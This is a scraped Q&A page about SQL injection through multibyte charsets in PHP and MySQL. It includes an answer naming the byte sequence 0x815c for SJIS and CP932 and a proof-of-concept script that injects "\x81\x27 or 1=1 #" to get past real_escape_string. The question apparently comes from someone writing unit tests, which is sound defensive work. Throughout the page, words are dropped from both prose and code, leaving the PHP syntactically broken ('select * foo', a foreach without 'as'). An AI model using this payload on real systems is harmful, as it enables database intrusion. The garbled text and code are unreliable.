php - How to create a SQL injection attack with Shift-JIS and CP932? -


i'm writing unit tests ensure code isn't vulnerable sql injection under various charsets.

according this answer, can create vulnerability injecting \xbf\x27 using 1 of following charsets: big5, cp932, gb2312, gbk , sjis

this because if escaper not configured correctly, see 0x27 , try escape such becomes \xbf\x5c\x27. however, \xbf\x5c one character in these charsets, quote (0x27) left unescaped.

as i've discovered through testing, however, not entirely true. works big5, gb2312 , gbk neither 0xbf27 or 0xbf5c valid characters in sjis , cp932.

both 

mb_strpos("abc\xbf\x27def","'",0,'sjis')

and

mb_strpos("abc\xbf\x27def","'",0,'cp932')

return 4. i.e., php not see \xbf\x27 single character. returns false big5, gb2312 , gbk.

also, this:

mb_strlen("\xbf\x5c",'sjis')

returns 2 (it returns 1 gbk).

so, question is: there character sequence make sjis , cp932 vulnerable sql injection, or not vulnerable @ all? or php lying, i'm mistaken, , mysql interpret totally differently?

the devil in details ... let's start how answer in question describes list of vulnerable character sets:

for attack work, need encoding server's expecting on connection both encode ' in ascii i.e. 0x27 and have some character final byte ascii \ i.e. 0x5c. turns out, there 5 such encodings supported in mysql 5.6 default: big5, cp932, gb2312, gbk , sjis. we'll select gbk here.

this gives context - 0xbf5c used example gbk, not universal character use of 5 character sets.
happens same byte sequence valid character under big5 , gb2312.

at point, question becomes easy this:

which byte sequence valid character under cp932 , sjis , ends in 0x5c?

to fair, of google searches tried these character sets don't give useful results. did find this cp932.txt file, in if search '5c ' (with space there), you'll jump line:

0x815c 0x2015 #horizontal bar

and have winner! :)

some oracle document confirms 0x815c same character both cp932 , sjis , php recognizes too:

php > var_dump(mb_strlen("\x81\x5c", "cp932"), mb_strlen("\x81\x5c", "sjis")); int(1) int(1)

here's poc script attack:

<?php $username = 'username'; $password = 'password';  $mysqli = new mysqli('localhost', $username, $password); foreach (array('cp932', 'sjis') $charset) {         $mysqli->query("set names {$charset}");         $mysqli->query("create database {$charset}_db character set {$charset}");         $mysqli->query("use {$charset}_db");         $mysqli->query("create table foo (bar varchar(16) not null)");         $mysqli->query("insert foo (bar) values ('baz'), ('qux')");          $input = "\x81\x27 or 1=1 #";         $input = $mysqli->real_escape_string($input);         $query = "select * foo bar = '{$input}' limit 1";         $result = $mysqli->query($query);         if ($result->num_rows > 1)         {                 echo "{$charset} exploit successful!\n";         }          $mysqli->query("drop database {$charset}_db"); }

Comments

Post a Comment

Popular posts from this blog

php - failed to open stream: HTTP request failed! HTTP/1.0 400 Bad Request -

this code i'm using find latitude , longitude of place: function coords($address){ echo $url="http://maps.googleapis.com/maps/api/geocode/json?address=".$address; $json = file_get_contents(urlencode($url)); $data = json_decode($json, true); print_r($data['results'][0]['geometry']['location']['lat']); print_r($data['results'][0]['geometry']['location']['lng']); } however returns warning: failed open stream: http request failed! http/1.0 400 bad request if use above code in simple procedure works fine not in function. note: have tried curl_init()... method produced same result? instead of encoding whole url encode address part. following code work fine $add='jamshoro phase 2'; $url="http://maps.googleapis.com/maps/api/geocode/json?address=".urlencode($add); $json = file_get_contents($url); $data = json_decode($json, true); print_r($data['r...
Read more

command line - Use qwinsta in PowerShell ISE -

i trying use qwinsta , rwinsta powershell code. when try run error "the term 'qwinsta' not recognized name of cmdlet, function, script file, or operable program." need able remotely on several machines without having add .dll's or modules other machines. tried terminal services powershell module, need able put on remote machines , not able that. within powershell ise how run qwinsta? not looking parse information gather it. following code have tried (which had found on site also): function get-tssessions { param( $computername = "localhost" ) qwinsta /server:$computername | #parse output foreach-object { $_.trim() -replace "\s+","," } | #convert objects convertfrom-csv } get-tssessions -computername "localhost" | ft -autosize best have running powershell ise (x86). when run command qwinsta there same error you. of course assuming have 64-bit os. th...
Read more

java - Incorrect order of records in M-M relationship in hibernate -

Image
i have 4 records in bridge table in mysql database. using @manytomany in hibernate, accurate order of employees incorrect incorrect of projects. following required material figure out doing mistake. this source. @entity @table(name="project") public class projectbean { @id @generatedvalue @column(name="project_id") private int projectid; @column(name="title") private string projecttitle; @manytomany(mappedby="projects") private collection<employeebean> employees; public projectbean() { employees = new arraylist<employeebean>(); } //getters & setters } @entity @table(name="employee") public class employeebean { @id @generatedvalue @column(name="employee_id") private int employee_id; @column(name="first_name") private string ...
Read more